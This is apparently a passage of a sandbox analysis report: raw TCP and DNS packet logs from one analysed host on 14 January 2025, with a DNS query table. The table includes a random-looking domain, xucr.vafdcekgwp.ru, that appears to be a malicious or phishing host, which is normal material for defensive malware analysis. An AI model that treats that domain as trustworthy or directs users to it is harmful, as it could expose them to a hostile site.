                      Jan 14, 2025 18:00:47.479954958 CET49719443192.168.2.5151.101.130.137
                      Jan 14, 2025 18:00:47.480386019 CET44349719151.101.130.137192.168.2.5
                      Jan 14, 2025 18:00:47.480550051 CET49719443192.168.2.5151.101.130.137
                      Jan 14, 2025 18:00:47.480552912 CET44349719151.101.130.137192.168.2.5
                      Jan 14, 2025 18:00:47.481538057 CET49719443192.168.2.5151.101.130.137
                      Jan 14, 2025 18:00:47.481720924 CET49719443192.168.2.5151.101.130.137
                      Jan 14, 2025 18:00:47.481743097 CET44349719151.101.130.137192.168.2.5
                      Jan 14, 2025 18:00:47.520910978 CET49722443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.548418045 CET4434972235.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:47.548510075 CET4434972235.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:47.548744917 CET49722443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.549393892 CET49722443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.549397945 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.549413919 CET4434972235.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:47.549428940 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:47.549505949 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.549947023 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:47.549959898 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.034018040 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.034333944 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:48.034360886 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.034691095 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.035425901 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:48.035485029 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.035758972 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:48.079327106 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.167505026 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.167592049 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:48.167648077 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:48.169651985 CET49723443192.168.2.535.190.80.1
                      Jan 14, 2025 18:00:48.169671059 CET4434972335.190.80.1192.168.2.5
                      Jan 14, 2025 18:00:53.463752985 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:53.463820934 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:53.463879108 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:54.279853106 CET5056253192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:54.287208080 CET53505621.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:54.287291050 CET5056253192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:54.292584896 CET53505621.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:54.737997055 CET5056253192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:54.742975950 CET53505621.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:54.743063927 CET5056253192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:54.945019007 CET49711443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:00:54.945034027 CET44349711142.250.186.132192.168.2.5
                      Jan 14, 2025 18:00:57.685810089 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:57.690721989 CET53505841.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:57.690886974 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:57.690970898 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:57.690994978 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:57.695761919 CET53505841.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:57.695782900 CET53505841.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:58.147557020 CET53505841.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:58.148931026 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:58.153894901 CET53505841.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:58.153992891 CET5058453192.168.2.51.1.1.1
                      Jan 14, 2025 18:01:01.172405005 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.172449112 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.172535896 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.172724009 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.172741890 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.649055004 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.650515079 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.650537014 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.651616096 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.651678085 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.652997017 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.653078079 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.653194904 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.653206110 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.708122015 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.785978079 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786026001 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786062956 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786066055 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.786081076 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786118031 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786134958 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.786143064 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786183119 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.786190987 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786700964 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.786752939 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.786772013 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.790623903 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.790657997 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.790680885 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.790689945 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.790733099 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.790740967 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.835349083 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.874218941 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874385118 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874432087 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.874445915 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874660015 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874686956 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874697924 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.874711990 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.874804020 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.875205040 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.875258923 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.875287056 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.875298023 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.875308037 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.875353098 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.875360012 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876205921 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876236916 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876254082 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.876261950 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876292944 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876302004 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.876308918 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.876359940 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.876367092 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.877192020 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.877224922 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.877240896 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.877248049 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.877288103 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.877294064 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.880630016 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.880669117 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.880683899 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.880691051 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.880734921 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.962975979 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963032961 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963102102 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.963113070 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963165045 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963218927 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.963226080 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963463068 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963519096 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.963526964 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.963572979 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964003086 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964066029 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964066029 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964076042 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964108944 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964695930 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964741945 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964752913 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964762926 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964791059 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964875937 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964926958 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.964934111 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.964976072 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.965851068 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.965883970 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.965912104 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.965919018 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.965940952 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.965955019 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.966690063 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.966733932 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.966739893 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.966747046 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.966768026 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.966778040 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.966784954 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.966814995 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967576027 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.967626095 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.967628002 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967636108 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.967663050 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967713118 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.967761040 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967873096 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967886925 CET44350609104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.967926979 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.967947960 CET50609443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.981091976 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.981142998 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:01.981223106 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.981462955 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:01.981479883 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.463675976 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.464086056 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.464107037 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.465212107 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.465291023 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.465655088 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.465719938 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.465785027 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.465790987 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.520410061 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.613063097 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613116980 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613147020 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613171101 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613198042 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613224983 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613262892 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.613266945 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613285065 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613300085 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.613316059 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613328934 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.613333941 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.613373995 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.613379955 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.661001921 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.661026955 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.707912922 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.719594002 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720101118 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720143080 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720179081 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720216990 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720233917 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720252037 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720233917 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720279932 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720300913 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720324993 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720360041 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720362902 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720370054 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720410109 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720416069 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720858097 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720890045 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720911026 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720916033 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.720951080 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.720961094 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721730947 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721776962 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721781015 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.721790075 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721826077 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.721833944 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721904993 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721942902 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721946955 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.721955061 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.721987963 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.722453117 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.770385981 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.770397902 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.811958075 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812031984 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.812053919 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812681913 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812711000 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812730074 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.812736034 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812769890 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812779903 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812788010 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.812793970 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812809944 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812819958 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.812849998 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.812855005 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.812865973 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.813504934 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.813545942 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.813579082 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.813585043 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.813610077 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.813631058 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.814507008 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.814546108 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.814562082 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.814567089 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.814584970 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.814604044 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.814630032 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.814681053 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.815071106 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.815120935 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.904457092 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904529095 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904563904 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904592037 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.904594898 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904609919 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904622078 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.904639006 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.904663086 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.904668093 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904692888 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:02.904731989 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.905117035 CET50615443192.168.2.5104.18.161.117
                      Jan 14, 2025 18:01:02.905133963 CET44350615104.18.161.117192.168.2.5
                      Jan 14, 2025 18:01:42.976186991 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:42.976249933 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:42.976345062 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:42.976629019 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:42.976643085 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:43.610384941 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:43.610867977 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:43.610894918 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:43.611366034 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:43.611771107 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:43.611841917 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:43.662339926 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:53.524805069 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:53.524964094 CET44350814142.250.186.132192.168.2.5
                      Jan 14, 2025 18:01:53.525043964 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:54.946085930 CET50814443192.168.2.5142.250.186.132
                      Jan 14, 2025 18:01:54.946129084 CET44350814142.250.186.132192.168.2.5
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 14, 2025 18:00:38.585664988 CET53634181.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:38.598084927 CET53618621.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:39.604578018 CET53592511.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:42.912328005 CET5542853192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:42.912471056 CET5780653192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:42.919461966 CET53578061.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:42.919553995 CET53554281.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:43.795444965 CET5260153192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:43.796288967 CET6241553192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:43.856775045 CET53624151.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:43.930470943 CET53526011.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:45.958472967 CET5660753192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:45.959356070 CET6065453192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:45.965347052 CET53566071.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:45.966051102 CET53606541.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:46.737449884 CET6418153192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:46.737880945 CET5652553192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:46.745059013 CET53641811.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:46.746386051 CET53565251.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:46.825498104 CET53523111.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:46.951061964 CET6111653192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:46.951376915 CET6030953192.168.2.51.1.1.1
                      Jan 14, 2025 18:00:46.959127903 CET53603091.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:46.959144115 CET53611161.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:54.279431105 CET53574681.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:56.678283930 CET53576981.1.1.1192.168.2.5
                      Jan 14, 2025 18:00:57.685224056 CET53508051.1.1.1192.168.2.5
                      Jan 14, 2025 18:01:01.163012028 CET5411753192.168.2.51.1.1.1
                      Jan 14, 2025 18:01:01.163161039 CET5124053192.168.2.51.1.1.1
                      Jan 14, 2025 18:01:01.170557022 CET53541171.1.1.1192.168.2.5
                      Jan 14, 2025 18:01:01.171593904 CET53512401.1.1.1192.168.2.5
                      Jan 14, 2025 18:01:01.972567081 CET6485853192.168.2.51.1.1.1
                      Jan 14, 2025 18:01:01.972700119 CET5902553192.168.2.51.1.1.1
                      Jan 14, 2025 18:01:01.979319096 CET53648581.1.1.1192.168.2.5
                      Jan 14, 2025 18:01:01.980635881 CET53590251.1.1.1192.168.2.5
                      Jan 14, 2025 18:01:38.149080038 CET53565531.1.1.1192.168.2.5
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 14, 2025 18:00:42.912328005 CET192.168.2.51.1.1.10xeee8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:42.912471056 CET192.168.2.51.1.1.10xc473Standard query (0)www.google.com65IN (0x0001)false
                      Jan 14, 2025 18:00:43.795444965 CET192.168.2.51.1.1.10x28b5Standard query (0)xucr.vafdcekgwp.ruA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:43.796288967 CET192.168.2.51.1.1.10xd218Standard query (0)xucr.vafdcekgwp.ru65IN (0x0001)false
                      Jan 14, 2025 18:00:45.958472967 CET192.168.2.51.1.1.10x71ecStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:45.959356070 CET192.168.2.51.1.1.10xed33Standard query (0)code.jquery.com65IN (0x0001)false
                      Jan 14, 2025 18:00:46.737449884 CET192.168.2.51.1.1.10x387cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 18:00:46.737880945 CET192.168.2.51.1.1.10xacd8Standard query (0)code.jquery.com65IN (0x0001)false
